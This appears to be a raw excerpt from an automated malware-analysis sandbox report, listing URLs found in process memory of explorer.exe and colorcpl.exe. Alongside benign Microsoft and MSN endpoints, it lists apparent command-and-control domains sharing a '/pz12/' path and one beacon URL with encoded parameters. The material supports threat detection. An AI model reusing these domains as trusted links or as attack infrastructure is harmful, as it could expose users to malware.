Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ainth.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.com/pz12/www.slotgame99.bet
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autonwheels.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyz
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyz/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyz/pz12/www.pureamyl.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.cripmz.xyzReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gabbygomez.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gabbygomez.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gabbygomez.com/pz12/www.missorris.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.gabbygomez.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guangdongqiangzhetc.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guangdongqiangzhetc.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guangdongqiangzhetc.com/pz12/www.nuevobajonfavorito.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.guangdongqiangzhetc.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.com/pz12/www.ma-google.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jnhdh8827.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.com/pz12/www.guangdongqiangzhetc.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.loyalbahis356.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ma-google.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ma-google.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ma-google.com/pz12/www.ainth.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ma-google.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.missorris.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.missorris.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.missorris.com/pz12/www.shrisona.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.missorris.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.motchillssss.top
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.motchillssss.top/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.motchillssss.top/pz12/www.98980901.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.motchillssss.topReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nuevobajonfavorito.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nuevobajonfavorito.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nuevobajonfavorito.com/pz12/www.jnhdh8827.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.nuevobajonfavorito.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pureamyl.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pureamyl.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pureamyl.com/pz12/www.317wb.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.pureamyl.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shrisona.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shrisona.com/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shrisona.com/pz12/www.cripmz.xyz
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.shrisona.comReferer:
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.slotgame99.bet
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.slotgame99.bet/pz12/
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.slotgame99.bet/pz12/www.gabbygomez.com
Source: explorer.exe, 00000006.00000003.2979320613.000000000C4F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3075027125.000000000C50B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3372800348.000000000C50B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.slotgame99.betReferer:
Source: explorer.exe, 00000006.00000002.3366414703.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2174937509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000006.00000002.3371448733.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000BFDF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/I
Source: explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000006.00000000.2173161867.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3365438539.000000000962B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=435B7A89D7D74BDF801F2DA188906BAF&timeOut=5000&oc
Source: explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000006.00000002.3365438539.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2173161867.000000000973C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMhz-dark
Source: explorer.exe, 00000006.00000003.3075508887.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com-
Source: explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzME7S.img
Source: explorer.exe, 00000006.00000002.3375867224.00000000111EF000.00000004.80000000.00040000.00000000.sdmp, colorcpl.exe, 00000007.00000002.3359339239.0000000005BFF000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://loyalbahis356.com/pz12/?tX9tN=1bMtYrqh7B54XFQP&uTm4D=mhHbh1AUgvkDqhcxvrHPgmJxw//lx/
Source: explorer.exe, 00000006.00000003.3075508887.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000006.00000000.2180275775.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000006.00000002.3366414703.00000000099AB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2174937509.00000000099AB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/e
Source: explorer.exe, 00000006.00000003.3075508887.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3371448733.000000000C087000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2180275775.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000006.00000000.2160009692.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3362876952.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
